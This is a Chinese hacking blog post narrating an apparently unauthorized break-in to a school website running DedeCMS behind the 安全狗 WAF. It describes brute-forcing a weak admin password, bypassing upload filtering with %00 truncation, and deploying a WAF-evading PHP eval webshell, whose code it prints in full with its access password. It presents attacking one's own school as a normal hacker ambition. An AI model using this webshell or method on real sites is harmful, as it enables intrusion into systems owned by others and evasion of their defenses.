绕过安全狗到getshell

今天一位好友跟我发信息,问我搞过织梦没,于是就有了下面这篇文章


项目?织梦站?真没听说过织梦的项目,而且还只有一个项目的站...

打开是学校网站,引起了我的怀疑,猜测是他学校的网站

和我最开始猜想的一样,每一位黑阔都想拿下自己的学校网站

起初我拿我学校的网站时,也没能getshell,只进了后台写了几篇文章

被老师请去喝茶,还想让我维护一下学校网络,哈哈

我只是觉得你骗人这个行为很不好啊

接着我们进入正题,首先是个dede,网上exp也很多,waf是安全狗

得到版本:20140814

尝试网上exp 修改了下可以过狗,但是都不存在漏洞

能用的只有一个友情链接getshell,先放一放

知道了有安全狗,利用织梦跑后台漏洞,跑下后台:

得到后台,发现没有验证码

爆破一下,发现是弱口令,接着登录之,尝试文件上传被安全狗拦截

利用%00截断绕过 (ps:马儿一定要能过安全狗,不然也一样被杀,同时还会被管理员发现)

过狗Webshell:(密码:xc)

<?php 
$string = '_POST';
$str = '$string';
eval("\$str = \"$str\";");
$str=$$str;
eval(@$str[xc]);
?>

连接之:

内网渗透不太行,就不在此献丑了,哈哈

本博客所有文章如无特别注明均为原创。作者:小陈复制或转载请以超链接形式注明转自 小陈's Blog - 致力关注于黑客技术、渗透测试、网络信息安全
原文地址《绕过安全狗到getshell
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)